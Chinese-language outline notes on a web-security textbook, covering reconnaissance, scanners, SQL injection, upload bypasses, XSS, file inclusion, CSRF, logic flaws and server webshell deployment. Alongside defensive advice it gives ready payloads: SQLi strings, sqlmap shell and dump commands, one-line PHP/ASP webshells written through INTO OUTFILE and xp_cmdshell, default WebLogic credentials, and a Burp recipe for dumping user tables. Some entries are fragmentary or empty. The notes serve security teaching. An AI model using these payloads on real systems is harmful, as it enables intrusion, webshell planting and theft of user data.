《Web安全深度剖析》
《Web安全深度剖析》 ● 简介、HTTP协议、抓包不再赘述略 ● 信息探测与收集
● Google Hack (baidu 等爬虫)
● 搜索子域名,示例:【site:baidu.com】
● 搜集 Web 信息 ● Google常用语法
● 【site 】:指定域名 ● 【ntext 】:正文中存在关键字的网页 ● 【intitle 】:标题中存在关键字的网页 ● 【inurl 】:url中存在关键字的网页 ● 【info 】:一些基本信息 ● 【filetype 】:搜索指定文件类型 ● 案例一:【intitle:管理登录 filetype:php】
● 查询网页标题中含有【管理登录】且为【php 类型】的网站(后台或指定类型的目标扫描)
● 案例二:【intext:Power by Discuz】
● Discuz搭建的论坛正文里基本都有个 Power by Discuz(熟悉 CMS 特征),配合最新的Disxuz漏洞危害严重。
● google的局限性,robots.txt,所以有时候需要自己写爬虫来获取某些信息
● 防御:
● Nmap (扫描)
● 简介:window图形界面的:Zenmap;命令行和 kali下的差不多,略 ● 参数
● 案例:-Pn:将所有主机视为在线——跳过主机发现
● Nmap 脚本引擎 ● .nse脚本 ,Script目录下,--script=脚本名称
● 官方脚本文档:nmap.org/nsedoc
● 案例 ● 案例一:扫描 Web 敏感目录【http-enum.nse】
● -p 80 --script=http-enum.nse
● 案例二:扫描 SqlInjection【http-sql-injection.nse】
● -p 80 --script=http-sql-injection.nse ● 案例三:使用所有的脚本进行扫描【--script all】,最好保存为文档-oN ● 案例四:使用通配符选择多个脚本扫描 ● nmap --script "http-*" 127.0.0.1,注意脚本名称用双引号避免 shell误解
● 还可以漏洞检测和密码暴力破解,更多参考 https://nmap.org/book/nse-usage.html,包括基本用法和脚本分类等
● DirBuster (目录、隐藏文件扫描)
● 简介
● kali自带
● 概览:
● 使用案例以及基本步骤:
● 爆破目录,也有爬虫功能
● 类似功能的工具还有 【WWWScan 】【御剑后台扫描珍藏版】等 ● 需要 递归式的扫描, 拿着扫描结果进一步地扫描
● 针对性扫描
● 指纹识别
● 简介:最重要的就是特征库
● 工具 ● Nmap:
● 【nmap -O】:操作系统指纹
● 【Nmap -A/sV】:端口服务版本等详细信息 ● 【御剑指纹识别】:可快速识别国内的一些主流 CMS(仅限国内)
● 【AppPrint】:Web容器指纹识别工具,可针对单个 IP、域名或 IP段进行 Tomcat、WebLogic、WebSphere、IIS 等 Web 容器识别
● kali自带的【whatweb】【httprint】等 Web 服务器指纹识别工具等 ● 在线指纹识别的网站:【云悉、shodan】等 ● 浏览器插件【Wapplyzer】等 ● 经验:
● 指纹伪造(少见)
● 子域名爆破
● lijiejie、layer挖掘机等 ● 漏洞扫描
● 概述:
● 概览
● Burp Suite
● 各个模块:
● 【Proxy】:代理模块,数据包拦截
● 【Target】:站点地图,Filter 过滤,Scope目标范围,Issue definitions 问题的定义
● 基本使用方法:
● 【Spider】:爬虫,默认被动进行漏洞扫描,高版本没有。proxy抓包 send to spider
● 基本使用方法:
● 【Scanner】:扫描漏洞
● 基本使用方法:
● 【intruder】:入侵模块,自动化攻击、爆破等。Attack type,程序变量,字典设置等。
● 基本使用方法:
● 【Repeater】:重放模块,拦截到的包 send to repeater,修改后“Go”发送请求,Response区域显示响应
● 【Decoder】:解码模块 ● 基本使用方法:解码、编码、hash、智能解码
● 【Comparer】:比较模块 ● 基本使用方法:
● 其他小问题:
● 中文乱码:User Options调成中文字体即可
● 恢复默认选项
● 使用插件:独立运行或者 BP 中添加或安装
● AWVS (Acunetix)
)
● 自动化 Web漏洞扫描工具
● 10 以及以下为客户端,10 以上为 web ● AWVS超详细中文手册:https://blog.csdn.net/madao1o_o/article/details/88548681】
● 基本使用方法(版本不同差别不大):
● 基本的一次扫描(web scanner)
● Web 端扫描服务
● 创建扫描
● AWVS小工具
● AppScan
● 简介
● 基本使用方法 ● 界面:
● AppScan 的全面扫描:探索和测试
● 示例:
● 处理结果
● AppScan 辅助工具:可以在菜单栏”工具“→”PowerTool“中找到
● 其他
● 不要过分依赖工具,重在积累经验
● 漏洞原理篇
● SQL 注入漏洞
● SQLi 原理
● 用户的输入数据被 SQL解释器执行 ● 形式:【闭合+攻击者的 SQL语句+注释】
● 经典实例:【" or 1=1 --】
● 需要推测后端程序源码的闭合方式,使 SQL语句提前闭合,并能执行自己的 SQL语句,注释掉或闭合后面的多余代码 ● 注入漏洞分类
● 概览
● 数字型注入 ● 判断 ● 【"】
引号处报错 ● 【1=1】正常【1=2】错误,页面存在布尔状态 ● 常见于弱类型语言,自动推导变量类型
● 字符型注入 ● 关键:如何闭合 SQL语句,注释多余的代码
● 判断 ● 常见的闭合方式(需要推测后端代码):【"】【"】【")】
● 常见的注释方式(数据库或脚本语言决定):【-- 】【#】
● 示例:
● select查询:【" and 1=1 -- 】
● update更新(例如 SQL Server 重置密码等):【"+(select @@version)+"】
● insert同 update ● SQL 注入的其他分类 ● 按出现的位置 ● Cookie、POST等 ● 按反馈形式 ● 盲注(根据页面布尔状态)、延时(根据延时)等 ● 到了数据库都可被归纳为【数字型】和【字符型】
● 常见数据库注入
● 概览:
● SQL Server
● 利用 错误信息提取信息 ● 对于用户不应该像对开发者一样【反馈详细的报错信息】
● 枚举当前 表及列:【 【group by 】【"having 1=1 -- 】
● 利用数据类型错误 提取数据:
● 【"and 1 > (select top 1 username from users ) 】
● 【"and 1 > (select top 1 username from users where username not in("root") ) 】
● 【"and 1 = convert(int , (select top 1 username from users) )】
● 【"and 1 = convert(int ,(select stuff((select ","+users.username,"|"+users.password from users for xml path("")),1,1,"")))】
● 获取 元数据 ● 元数据库【INFORMATION_SCHEMA】
● 【INFORMATION_SCHEMA.TABLES 】视图:表 ● 【INFORMATION_SCHEMA.COLUMNS】
视图:字段 ● 取得当前数据库表 ● 【select table_name from information_schema.tables 】
● 取得 Student表字段 ● 【select column_name from information_schema.columns where table_name="Student" 】
● 常见视图
● Order by 子句(通用)
● 【order by N】,按第 N 列排序,当第 N 列不存在时报错,可判断列数
● UNION 查询(通用)
● 基本规则:
● 列数相同 ● 数据类型兼容 ● 探测字段(列)数 :【union select null,null,null】
● 三列:【union select null,"x",null from sysobject where xtype="U" 】
● 示例:
● 无辜的 (系统)函数 ● 系统函数和常用函数
● 危险的 存储过程 ● 常见的危险存储过程
● 角色与权限
● 动态执行 ● exec(),十六进制绕过防火墙过滤
● Mysql( ( ※ )
● 基本思路同 SQL Server,语法存在差异。如:SQL Server:@@version;mysql:version()。
● Mysql中的 注释 ● 【#】【-- 】【/**/】【/*! */】
● 获取 元数据 ● 【INFORMATION_SCHEMA】信息数据库 ● 查询数据库名称 ● 【select SCHEMA_NAME from INFORMATION_SCHEMA.SCHEMATA 】
● 查询当前数据库表 ● 【select TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA=(select DATABASE()) 】
● 查询指定表的所有字段 ● 【select COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ="Student" 】
● 案例:【limit 0,1】【linit 1】
● UNION 查询
● 差别:【Oracle】需要加【表名】,【SQL Server】和【Oracle】数据类型不确定时使用【null】
● Mysql 函数利用 ● 常用函数
● 【 load_file() 】:读取文件
● 十六进制绕过、char强制类型转换绕过、hex 解决乱码问题
● 【 into outfile 】:写文件
● 【 连接字符串 】:
● 【 concat() 】:
● 【concat_ws()】
● 【 load_file() 】:读取文件 ● 权限
● Mysql 显错式注入 ● 【updatexml 】【extractvalue 】【floor 】
● 【updatexml 】
● 【and updatexml(1,(concat(0x7c,(select @@version))),1)】
● 【extractvalue 】
● 【and extractvalue(1,concat(0x7c,(select user())))】
● 【floor 】
● 【union select * from(select count(*),concat(floor(rand(0)*2,(select user()))a from information_schema.tables group by a)b】
● 宽字节注入 ● 编码不统一导致的,gbk 编码为双字节编码 8140-FEFE ● 【\】是【5c】【%df5c】就构成了一个汉字从而绕过了转义,df可以换为 81-FE之间的,让 magic_quotes_gpc的转义反斜杠\参与构成了一个 GBK 编码的汉字,从而使后面的单引号或双引号之类的注入生效,https://mubu.com/doc/3ikGy9mE_Wr
● Mysql 长字符截断
● 配置问题:mysql的设置中【sql_mode:default】
● 示例:
● 延时注入
● 基于时间差异的盲注
● 【and sleep(3)】
● 思路:【length()】【hex(mid(target,L,1))】,通过延时判断假设的表达式的真假,来一点点地猜解
● Oracle
● 获取 元数据 ● 【user_tablespaces】视图:查看表空间 ● 【select tablespace_name from user_tablespaces】
● 【user_tables】视图:查看当前用户的所有表 ● 【select table_name from user_tables where rownum = 1】
● 【user_tab_columns】视图:查看当前用户的所有列,例如查看 user表的所有列 ● 【select column_name from user_tab_columns where table_name= "users"】
● 【all_users】视图:查看 Oracle数据库的所有用户 ● 【select username from all_users】
● 【user_objects】视图:查看当前用户的所有对象(表名称、约束、索引)
● 【select object_name from user_objects】
● UNION 查询 ● 【order by 】【union select null,null,null from dual 】
● 获取敏感信息
● 获取数据库表以及其内容
● Oracle中 包的概念 ● 简介
● 页面不能直接回显,反弹数据
● 写文件
● 读文件
● 执行系统命令 ● 第一步:创建 Java 执行代码包
● 第二步:赋予用户 Java 执行权限
● 第三步:创建函数,调用 Java 代码 ● 第四步:执行命令
● 常见包
● 注入工具
● 概览
● SQLMap
● 简介
●
● 基本使用 ● 【-u "URL"】:判断是否存在注入点 ● 【-u "URL" --dbs 】:获取数据库 ● 【-u "URL" --current-db】:当前数据库(假设为 cdb)
● 【-u "URL" -D cdb --tables】:列出 cdb数据库的所有表 ● 【-u "URL" -D cdb -T table1 --columns】:列出 cdb数据库的 table1表中的所有字段 ● 【-u "URL" -D "cdb" -T "table1" -C "user,passwd,emails" --dump 】:获得指定字在 段的内容,除了回显,还会保存在 SQLMap/output/ 目录下,名为 “ 表名.cvs” ● 常用参数 ● 测试注入点权限:【--privileges】
● 【sqlmap -u [URL] --privileges】
//测试所有用户的权限 ● 【sqlmap -u [URL] --privileges -U sa】
//测试 sa用户权限 ● 执行 Shell命令:【--os-cmd】
● 【sqlmap -u [URL] --os-cmd="net user"】
//执行 net user命令 ● 【sqlmap -u [URL] --os-shell 】
//系统交互的 shell ● 执行 SQL命令:【--sql-shell 】
● 【sqlmap -u [URL] --sql-shell 】
//返回 SQL交互的 shell,可以执行 SQL语句 ● 【sqlmap -u [URL] --sql-query="sql"】
● POST提交方式:【--data "POST 参数"】
● 显示信息的详细(程度)等级:【-v 0-6】
● 【sqlmap -u [URL] --dbs -v 1】
● -v 参数包含以下 7 个等级 ● 【0】:只显示 python的回溯、错误和关键消息 ● 【1】:显示信息和警告消息 ● 【2】:显示调试消息 ● 【3】:有效载荷注入 ● 【4】:显示 HTTP 请求 ● 【5】:显示 HTTP 响应头 ● 【6】:显示 HTTP 响应页面的内容 ● 注入 HTTP 请求:【-r head.txt】
● 【sqlmap -r head.txt --dbs】
//head.txt内容为 HTTP 请求,例如 BP的抓包 ● 直接连接到数据库 ● 【sqlmap -d "mysql://admin:admin@192.168.1.8:3306/testdb" --dbs】
● 注入等级:【--level】
● 【sqlmap -u [URL] --level 3】
● 【1】:默认 ● 【2】:cookie会被测试 ● 【3】:user-agent/referer 会被测试
● 【5】:包含的 payload 最多,会自动破解出 cookie、XFF等头部注入,但速度也会很慢。
● 【-p】指定想要测试的参数:-p "id,user-agent" ● 【--skip=""】:level很大但有个别参数不想测试的时候使用--skip来跳过:--skip "user-agent.referer" ● 将注入语句插入到指定位置:【*】
● 【sqlmap -u "http://www.test.com/id/2*.html" --dbs】
● 使用 SQLMap 插件:【-tamper】//插件都保存在 sqlmap/tamper 下,这些插件通常用来绕过 WAF(web应用防火墙)
● 【sqlmap -u [URL] -tamper "space2morehash.py"】
● 其他常用参数 ● 参考:https://github.com/sqlmapproject/sqlmap/wiki/Usage ● 常用参数以及说明
● 【】
● 【】
● 【】
● 【sqlmap -u [URL] --data "POST参数"】
● Pangolin
● 穿山甲,略 ● Havij
● 自动化 sql注入软件,略 ● 止 防止 SQL 注入
● 概览:
● 数据类型判断、特殊字符转义
● 严格的数据类型 ● 数字型注入:Java、C#等强类型语言几乎可以忽略;PHP、ASP 需要 is_numeric()、ctype_digit()等函数判断数据类型
● 特殊字符转义 ● 还有黑白名单策略,对特殊字符整理成黑名单,统一进行转义等过滤操作。
● 二次注入攻击:利用第一次过滤后的正常输入来闭合第二次的 sql语句
● 使用预编译语句 ● JAVA:prepareStatement、setter,动态拼接 sql语句就没用了
● 框架技术 ● 对象关系映射 ORM注入、HQL注入, 动态拼接就可能会存在注入
● 改进代码:【?】【setParameter(0,id)】;【:id】【setParameter("id",id)】
● 存储过程 ● exec、动态拼接等依然会造成 SQL注入。
● 小结 ● 先工具,后手工辅助。代码规范形成模板。
● 上传漏洞
● 概述 ● Web 应用允许上传文件,没有做严格验证或过滤
● 解析漏洞
上传漏洞常与 Web 容器的解析漏洞配合使用。
常见的 Web 容器:IIS、Apache、Nginx、Tomcat等
● IIS 解析漏洞 ● IIS 6.0 ● 【.asa 】【.asp 】文件夹下的任意文件都会当作 asp 文件解析 ● 【.asp;1.jpg 】文件也会以 ASP脚本执行
● WebDav
● 开启后,如果支持 PUT、Move、Copy、Delete等方法
● 测试步骤如下:
● 【OPTIONS】探测 HTTP方法
● 【PUT】上传脚本文件(一句话木马等)
● 【Move】或【Copy】改名,至此,获取 webshell
● 【DELETE】还可以删除服务器上的任意文件
● WebDav漏洞检测工具:【IIS Write】
● Apache 解析漏洞 ● 扩展名从后向前知道遇到认识的解析,【/conf/mime.type】下记录有 Apache 认识的扩展名
● 可以绕过黑名单【1.php.rar】
● PHP CGI 解析漏洞 ● 【/1.jpg/1.php】:1.jpg被当作 php脚本来解析,通用:【/1.jpg/XXX.php】
● PHP配置文件中的 【cgi.fi : x_pathinfo】
选项默认开启,造成 PHP向前的递归解析 ● 常见于 Nginx+PHP ● 绕过上传漏洞
● 概述 ● 客户端。服务端检测,菜刀(蚁剑)和一句话木马。
● 中国菜刀、Edjpgcom
● 客户端检测 ● 概述 ● JS客户端验证,约等于无,可以通过各种方法轻易绕过。上传文件的处理:php脚本控制,将临时目录中的上传文件,重命名,放到指定目录下,如 move_uploaded等处理。
● 绕过方法 ● 使用 FireBug,已经淘汰,使用 Firefox Developer Editor 即可
● 【F12】打开开发者工具:操作方法相同。在保证身份认证通过的情况下,对请求页面做出自己的修改来绕过客户端检测
● 中间人 BP ● 先正常通过客户端验证,再 BP截获客户端请求进行非法修改,就绕过了客户端验证。
● 服务器端检测 ● 概述 ● 黑白名单、文件类型、文件重命名。注意解析漏洞。
● 黑白名单策略 ● 黑名单过滤
● 绕过方法
● 白名单过滤
● 绕过方法
● MIME 验证 ● 概述 ● MIME(多用途互联网邮件扩展类型),指定某种扩展名文件的打开方式
● 示例 ● 简单的一个 jpg 类型判断,md5 文件名重命名,再 move_uploaded_file将上传文件移到指定目录
● 绕过:BP拦截,修改 Content-Type也就是 MIME类型即可
● 目录验证 ● 上传文件的保存路径在前端暴露,参数可控,利用解析漏洞,将文件夹名称改为.asp,则 IIS 6.0其下的所有文件都会被解析为 asp 文件,包括木马。
● 示例:
● 截断上传攻击 ● 【%00】:00截断,ASP、PHP、JSP等均存在,以 asp 为例
● 示例:
● 存在 00 截断漏洞的典型的 ASP代码
● BP拦截请求
● BP 修改文件名为 1.asp 空格 xxx.jpg,HEX 模式下将空格 20 改为 00,即可截断。绕过了文件类型验证,最后得到的还是 asp 脚本文件
● 文本编辑器上传漏洞
● 概述 ● 富文本编辑器:品类繁多,功能丰富,漏洞危害范围大。
● 敏感信息暴露 ● 富文本编辑器的目录往往存在一些敏感文件,没有处理干净就会被攻击者获取敏感信息,详情可查看各自的官网手册等
● 黑名单策略错误 ● 过滤不干净
● 任意文件上传漏洞 ● 示例:
● upload.php,只看第一块验证阶段即可
● config.php 中记录的格式配置为:发现没有 Media,这意味着可以上传任意类型文件,(绕过了 Type检测,count(……)>0 为假,故可以上传任意类型文件)
● 利用
● 其他漏洞:可查阅对应的漏洞库
● 修复上传漏洞
● 【目录过滤】【文件重命名】
● 没有绝对的安全
● 小结 ● 路径验证、随机重命名
● XSS 漏洞
● 简介 ● 用户使用浏览器访问被嵌入恶意代码的页面时,恶意代码将会在用户浏览器上执行。
● XSS 原理解析
● 概述
● 示例:JS、挂在外部恶意脚本、无视扩展名只要包含 JS代码就会执行
● XSS 类型
● 反射型 XSS ● 概述
● 示例:在用户登陆的情况(包含各种身份认证等敏感信息)下,诱使用户点击自己构造的还有恶意 JS代码的连接(短链、自己搭建的服务器等),恶意代码沉默式执行(功能很多,如获取当前登录的 cookie等敏感信息并发送给攻击者,攻击者就可以劫持会话,以被害者的身份登录,被害者是管理员将直接获取网站的管理权:创建隐蔽用户、上传webshell等)。
● 存储型 XSS ● 概述
● 示例 ● 查看【输出点】,构造 闭合使 XSS语句生效
● 【显示标签】,FUZZ
● DOM XSS ● 概述 ● 【DOM】、一切都是节点、节点树
● 示例:应该是+8,length("content=")=8
● 测 检测 XSS
手工精准,工作量大;软件自动化方便,但存在误报和漏报。
● 手工检测 XSS
● 可得知输出位置时 ● 需要判断输入和输出做了哪些转义和过滤
● 无法得知输出位置时 ● 构造一些模糊测试来根据特殊的反馈(管理员封禁,管理员的 cookie发送过来了之类的)来测试后台页面构造
● 全自动检测 XSS ● XSStrike(github)、XSSER(github)、XSSF等工具,http://www.domxssscanner.com/ (失效)等网站
● XSS 高级利用
● 危害 ● 盗取用户 Cookie ● 修改网页内容 ● 网站挂马 ● 利用网站重定向 ● XSS蠕虫 ● XSS 会话劫持 ● Cookie 简介 ● 用途、存储位置、数量和大小限制
● Cookie 格式 ● 保存位置可通过 IE浏览器查看
● 示例:
● 【Cookie格式】
和 【标准的 Cookie变量】
如下:
● 读写 Cookie ● 示例:
● 观察 cookie:服务器端发送的 Set-Cookie,客户端后续请求时的 Cookie字段
● Javascript 操作 Cookie
● 身份认证信息被截获,用户会话被劫持。BP proxy模块 options→Match and Replace,为请求头添加正则和替换
● 浏览器控制台【document.cookie=""】来设置或覆盖 cookie
● 注意:身份验证不止有 Cookie还有很多别的临时信息,很多时候光拿到 cookie完成不了身份和会话的劫持 ● SESSION ● 概念:服务器端、SESSIONID
● 示例:拿到 SESSIONID,在会话结束前同样能会话劫持
● XSS Framework
● XSS漏洞利用框架
● XSS Platform,https://xsspt.com/index.php,参考:https://mubu.com/doc/2Stf67wOwxr ● 创建项目、配置模块
● 得到测试代码、利用方式
● 插入并等待
● 得到 cookie
● XSS GetShell ● 案例:DeDeCMS ● 提交数据到 feedback_ajax.php,拦截 HTTP请求
● 源代码审计:隐藏的没有过滤的 title变量
● 添加 title请求
● 造成 XSS
● 利用 XSS构造写入 shell文件的请求,沉默式触发这个请求的方式常用【form 表单自动提交】【JavaScript 的 AJAX 技术】
● 【构造 HTML 自动提交表单】
● 示例:
● 【AJAX 发送 POST 请求】
● 构造 AJAX 请求文件
● 小马被管理员不知情地创建,getshell
● XSS 蠕虫 ● 概述
● 示例:两个请求链接:关注自己、转发本条微博(需获取用户 id,AJAX)。最后效果:一点开链接就会转发并关注,其他人也是如此。
● 复 修复 XSS 跨站漏洞
● 输入与输出 ● 转义特殊字符
● PHP:
● 【htmlspecialchars()】【htmlentities()】
● Java: ● Jsoup.clean(XXX, Whilelist.basic());
● Whilelist代码如下:
● OWASP ESAPI:
● XSS可能发生的场景:
● 编码器 ● HTML编码
● CSS编码
● Javascript编码
●
● HttpOnly ● 概述:cookie仅用于 http,不能用 JS获取
● 命令执行漏洞
攻击者可以随意执行系统命令,B/S、C/S 均存在
● OS 命令执行漏洞示例
● DVWA
●
● 命令执行模型(模式/ 方式)
● 代码执行:脚本执行 OS命令;OS命令执行:直接调用系统命令
● PHP 命令执行 ● 实例一:命令执行,system()
● 实例二:代码执行,eval()
● 实例三:动态函数调用,$fun($para)
● 实例四:PHP函数代码执行漏洞
● Java 命令执行 ● Runtime.getRuntime().exec(命令)
● 框架执行漏洞
● Struts2 代码执行漏洞 ● Structs2 < 2.2.0
● Structs 2.0.0~2.3.15
● ThinkPHP 命令执行漏洞 ● preg_replace 的 /e参数
● 防范命令执行漏洞
● 不使用系统执行命令、过滤、动态函数使用指定函数、不用不可控的危险函数
● 文件包含漏洞
● 概述 ● 重用性高代码文件,包含,动态包含,PHP 居多
● 包含漏洞原理解析
● PHP 包含 ● include、include_once、require、require_once
● 文件包含 示例:
● 本地文件包含 Local File Include (LFI )
● 两个简单的本地包含示例
● 无所谓扩展名,被包含文件中的 PHP 内容会被 PHP 解析,非 PHP 内容会暴露源码。
● 远程文件包含 Remote File Include (RFI )
● php.ini 开启 allow_url_include。除了使用 URL包含文件,其他一样。
● 文件包含 漏洞示例:
●
包含不存在的文件时报错会暴露敏感信息:网站绝对路径等
● 文件包含 利用 ● 读取敏感文件 ● 常见的敏感文件路径
● 远程包含 shell ● 远程文件能够生成一句话木马
● 本地包含配合文件上传 ● 文件上传能够生成一句话木马的图片,文件包含这个图片
● 使用 PHP 封装协议 ● PHP支持的协议和封装协议:https://www.php.net/manual/zh/wrappers.php
● 使用封装协议读取 PHP 文件 ● 【php://filter/read=convert.base64-encode/resource=config.php】
● 写入 PHP 文件 ● 【allow_url_include=On】,【php://input】,如【<?fputs(fopen("shell.php","w"),"<?php eval($_POST["xxser"]);?>")?>】
● 包含 Apache 日志文件 ● 存在文件包含漏洞,但没有文件上传等切入点时,可以利用【Apache 日志文件 件】:
● 【access.log (访问日志)】和【error.log (错误日志)】
●
● 截断包含 ● 背景,【%00 】截断
● 【./././././././././././././…… 】截断
● 绕过 WAF 防火墙 ● 文件包含一句话木马图片绕过 WAF检测
● JSP 包含 ● 静态包含 ● include 为静态包含:只允许包含一个已经存在与服务器中的文件,不能使用变量来控制包含,不存在文件包含漏洞
● 动态包含 ● jsp:include:非 JPS文件扩展名的 JSP内容不会被解析
● Servlet
● Servlet包含
● java中 URL的跳转分为两类:
● 客户端跳转 ● 重定向,response.sendRedirect()或者 JS
● 服务器端跳转 ● ResponseDispatcher 接口的 forword方法,暴露 web.xml
●
● 安全编写包含
● 其他漏洞
● CSRF
● 简介
● CSRF 原理 ● 利用用户登录状态,欺骗用户做用户不知情地合法请求
● CSRF 攻击场景 ● (GET )
● 微博 CSRF蠕虫攻击,诱惑性链接、自动化收听并转发,类似 XSS蠕虫。
● CSRF攻击是黑客借助受害者的 Cookie骗取服务器的信任,但是黑客不能也不用获取到 Cookie。只是诱导用户自己不自觉地做出了一次正常请求。CSRF所能做的就是给服务器发送请求。
● (POST )
● 构造 form表单并自动提交即可
● 静默请求:AJAX、隐藏 fiframe并指定表单的 target等
● 浏览器 Cookie 机制(策略)
● 本地 Cookie(持久性 Cookie),设置了 Expire 字段,存储在 本地 ● 临时 Cookie(Session Cookie),没有设置了 Expire字段,存储在 浏览器内存中, 浏览器关闭,Session Cookie 也消失 ● 示例:
● 不同浏览器机制不同,IE比较特殊。
● 检测 CSRF 漏洞 ● 手工检测 ● 确定 Web 应用的所有功能 ● 确定敏感操作 ● 拦截 HTTP 请求,确定参数意义 ● CSRF POC
● 如下
● 半自动检测 ● CSRFTester ● 基本检测流程
● 生成的 form表单如下
● BP
● 拦截,engagement tools 生成
CSRF POC
● 全自动误报率大(略)
● 预防 CSRF ● 二次确认 ● Token(令牌)认证 ● token
● 使用 token防御 CSRF
● XSS 和 CSRF ● XSS > CSRF
● 逻辑错误漏洞
● 概述
● 挖掘逻辑漏洞 ● 重点:【业务流程】、【HTTP/HTTPS请求篡改】
● 绕过授权验证 ● 水平越权 ● 定义:
● 示例:修改对应 ID的密码,当 ID 用户可控(例如 BP拦截修改),则可修改任意用户的密码。
● 防护:加入二次验证
● 垂直越权 ● 定义:不同级别、不同角色之间的越权 ● 分为 向上越权 和 向下越权
● 示例:向上越权为例 ● 同一张表
● 不同表,过滤器中直接取出管理员信息即可 ● Java 的 Filter 过滤器
=
Struts2 拦截器 ● 密码找回逻辑漏洞 ● 客户端暴露了敏感参数
● 支付逻辑漏洞 ● 商品数量为负数 ● 代码略,当商品数为负时,钱会增多,商家的商品也会增加。
● 0 元购买商品 ● 不正确的异常处理 ● 其他:商品价格修改、物流运费修改等 ● Fuzz Testing:模糊测试 ● 指定账户恶意攻击 ● 如:得知指定账户的信息后利用系统正常功能:登录失败 X 次冻结,来恶意封锁用户账号 ● 代码注入
● 分类 ● OWASP 分类 ● OS命令执行 ● 文件包含 ● 动态函数调用 ● 代码执行 ● Wikipedia 分类 ● SQL注入、XML注入、XSS、文件包含、命令执行等 ● XML 注入 ● 与 XSS类似,关键:
闭合 XML 标签 ● XML注入的两大要素:标签闭合和获取 XML结构 ● 示例:就会增加一个 hack的管理员账号
● 修复:预定义字符转义
● XPath 注入 ● XPath 基础语法
● XML、XPath、SQL注入的方式类似
● JSON 注入 ● 基础概念
● 注入,防御:转义
● HTTP 参数污染(HTTP Parameter Pollution ,HPP )
● HPP后,根据脚本语言和环境的不同,取值也不同
● HPP常用来绕过一些 WAF:WAF取值可能会选择第一项参数值,而取值脚本与 WAF选择不同,则有可能绕过 WAF数据验证
● URL 跳转与钓鱼
● URL 跳转 ● 客户端跳转
● 又称 URL重定向,URL会有明显变化,如:response.sendRedirect("x.jsp");
● 服务器端跳转 ● 又称 URL转发,用户浏览器地址栏的 URL不会变化
● 其他跳转 ● 直接向服务器发送请求,如<a>标签:
<a href = "http://www.xxx.com/news.jsp">新闻列表</a> ● 钓鱼
● 简介
● 利用 URL跳转来躲过检测
● URL跳转漏洞,也称 URL重定向漏洞
● PHP、ASP、ASP.NET等脚本语言都有类似的代码进行重定向。如 PHP:
● XSS漏洞也可以跳转 ● 案例:
● WebServer 远程部署
● 属于 配置性错误漏洞
● Tomcat (8080 )
● 初始配置并不安全
● 攻击过程 ● 制作 WAR格式的 Shell程序
● WAR文件部署
● 防御
● JBoss (8080 )
● 默认无需密码即可登录后台管理,没有密码认证 ● 部署 WAR包过程 ● 【JMX Console】
● 【jboos.deployment】【flavor=URL,type=DeploymentScanner】
● 【WAR文件的下载地址 URL】【addURL】【Invoke】
● 【部署成功】,但是临时文件,服务器重启后文件消失 ● 利用:
● 由于默认没有密码认证策略,所以攻击者常常通过 Google Hack 来批量获取Webshell ● 防御:管理员必须将 JBoss的 jmx-console密码认证开启,或者删除 jmx-console ● WebLogic (7001 )
● 默认的后台管理界面:/console/login/loginForm.jsp ● 存在密码验证策略,密码要求严格 ● 老版本的弱口令,账密为(可交叉使用):
● Weblogic ● system ● portaladmin ● guest ● 部署 WAR包 getshell
● 实战篇
● 实战入侵与防范
● 开源程序安全剖析
● 0day 攻击 ● 概念
● 利用:【google hack采集+自动化批量化 EXP】与 漏洞信息库
● 【代码审计】:seay、cobra等。
【FUZZ】
● 网站后台安全 ● 后台脆弱性原因 ● 模板 ● wordpress:外观、编辑、模板,编辑 404.php模板加入一句话木马,连接即可
● 文件编辑中的【源码暴露(没有限制文件读取目录)】和【任意保存】
● 文件管理 ● 与模块获取 Webshell类似
● 执行 SQL 语句 ● 数据库用户权限较大,攻击者就可以 SQL语句到处 WebShell ● 示例:mysql+phpmyadmin,向数据库中插入一句话木马再导出到硬盘中,【select "<?php @eval($_POST[cmd])?>" INTO OUTFILE "F:/php/htdocs/phpMyadmin/x.php"】
● 数据库常用的导出语句如下:
● Access ● 常规:
● 简短:
● 【SELECT "代码" into [Excel 5.0;HDR=YES;DATABASE=c:\test.asp;1.xls].["xxx"] from 表】
● 【SELECT "<%execute request(chr(35))%>" into [xxser] in "c:\e.asp;xls" "excel 5.0" from 表】
● 注意:
● SQL Server ● Xp_cmdShell:【exec master..xp_cmdshell "echo ^<%eval request("chopper")%^> >c:\111.txt "】
● Oracle ●
●
● 网站备份 ● 示例:
● 上传图片木马,将图片木马备份至.asp 或.asa等脚本格式,getshell ● MD5 还安全吗 ● MD5 密文 32伪,16 位 MD5 为第 8-24位的值 ● 破解方法:
● 彩虹表 ● 针对各种组合预先算好哈希值的集合 ● 主流算法都有对应的彩虹表 ● 体积往往非常大 ● 性能高,辅以 NVidia CUDA 技术和 NTLM算法 ● 获取途径:网络下载、工具生成:RainbowCrack、Cain 等 ● MD5 破解站点 ● 常用
● 防范:修改加密算法,二次 MD5也不安全、研究新的加密算法等
● 拖库
● 导出数据库中的数据、社工库,导出操作:外连接、本地
● 支持外连接 ● 数据库密码,【ASP.NET】、【PHP】、【JSP】的配置文件
● 示例:Navicat软件拖库,转存数据方式:
● 导出表数据(纯数据)
● 导出表结构以及数据(完全复制)
● 不支持外连接 ● SQL 注入 ● SQLMap ● --dump
● --csv-del ● --output-dir ● --dump-format ● Burp Suite ● 比 SQLmap更加灵活且稳定 ● 获取数据前需要确定的信息:
● 表结构 ● 可交由 SQLMap ● -u --current-db ● -u -D --tables ● -u -D -T --columns ● 导出数据条数,确定最后的主键 ID ● sqlmap ● -u -D -T --count ● -u -D --sql-query="SQL语句"
● 构造好导出的 SQL语句,抓取数据 ● BP
intruder 模块,构造 sql语句
● 设置变量:uid
● 设置 payload:numbers
0~23308,step=1
● 选择抓取的数据 ● 【Option】
【Grep Extract】【add】【Fetch Response】,返回信息中选取你要抓取的内容,BP会根据选取的内容自动生成正则表达式
● 点击【OK】,继续添加抓取邮箱、密码的正则表达式 ● 【Start attack】,抓取完数据后,选择【Save】→【Result Table】
● 剔除空白行:分页技术
● 【select * from table limit I,N】,变量 I,范围 1-count,N=1
● 主流数据库常用的分页语句如下:
● Postgre SQL ● 【select * from table limit I offset N 】
● Oracle ● 【select t2.* from (select rownum r,t1.* from table t1 where rownum<N) t2 where t2.r>I 】
● Mysql ● 【select * from table limit I,N 】
● SQL Server ● 【select * from (select top I+N * from table) a where id not in (select top I id from table) 】
● SQLServer 分页的写法很多,这是其中最简单的一种,效率较低,是用于小数据 ● 其他工具:火车头、八爪鱼等 ● 越权访问 ● 页面中显示数据的列全部遍历出来,依旧是 BP
● 本地导出
